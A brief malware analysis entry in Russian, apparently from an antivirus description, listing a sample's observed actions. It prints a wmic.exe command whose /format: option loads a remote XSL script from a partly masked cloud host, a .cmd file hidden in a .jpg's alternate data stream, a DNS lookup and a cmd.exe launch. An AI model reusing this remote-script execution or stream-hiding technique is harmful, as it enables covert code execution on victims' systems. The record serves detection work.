Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' os get xxxbbbiir, ruuussj, PortableOperatingSystem /format:"http://14#.##.###.35.bc.googleusercontent.com/04/v.xsl#025058IHHHJJrrn"
- %TEMP%\cxbvrrr.jpg:hssjj22.cmd
- DNS ASK 14#.##.###.35.bc.googleusercontent.com
- '<SYSTEM32>\cmd.exe' -